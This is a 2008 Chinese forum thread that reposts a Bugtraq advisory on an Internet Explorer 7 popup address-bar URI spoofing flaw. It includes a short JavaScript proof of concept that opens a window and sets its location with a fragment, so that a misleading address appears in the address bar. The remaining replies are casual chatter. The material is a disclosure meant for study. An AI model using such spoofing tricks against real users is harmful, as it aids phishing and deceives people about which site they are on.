IE7弹出窗口地址栏URI欺骗漏洞

社区服务
高级搜索
猴岛论坛电脑百科IE7弹出窗口地址栏URI欺骗漏洞
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
3个回复

IE7弹出窗口地址栏URI欺骗漏洞

楼层直达
罖罖罖

ZxID:1237416

等级: 元帅
|▌秂到死莳財綄渼、

举报 只看楼主 使用道具 楼主   发表于: 2008-04-10 0
描述:

  BUGTRAQ ID: 28498

  Internet Explorer是微软发布的非常流行的WEB浏览器。

  如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。

  <*来源:Juan Pablo Lopez Yacubian ([email protected])

  链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2

  *>

  测试方法:

  警 告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<script language="JavaScript">
function iniciar()
{

nuevaventana = window.open("", "Win", "width=500,height=500,location=1");

nuevaventana.document.location = "http://www.google.com.ar/#" +  "www.microsoft.com/";

}
iniciar()
</script>



  建议:

  目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

  http://www.microsoft.com/windows/ie/default.asp
别问我DB多少钱,卖不卖,
不卖!
1元1个,你买么,
不买吧!
奋、  ˉ斗

ZxID:1306520

等级: 少将
没有最好的..!      .
举报 只看该作者 沙发   发表于: 2008-04-10 0
不用IE。。。。。。。。。。。。。。。。。用  遨游      嬉戏~~~还是谢谢 LZ
独々存

ZxID:1270856

等级: 禁止发言

举报 只看该作者 板凳   发表于: 2008-04-10 0
我用IE,但不懂LZ说的什么~~~
lkm_h

ZxID:1229042

等级: 列兵
举报 只看该作者 地板   发表于: 2008-04-11 0
楼上真幽默
« 返回列表
发帖 回复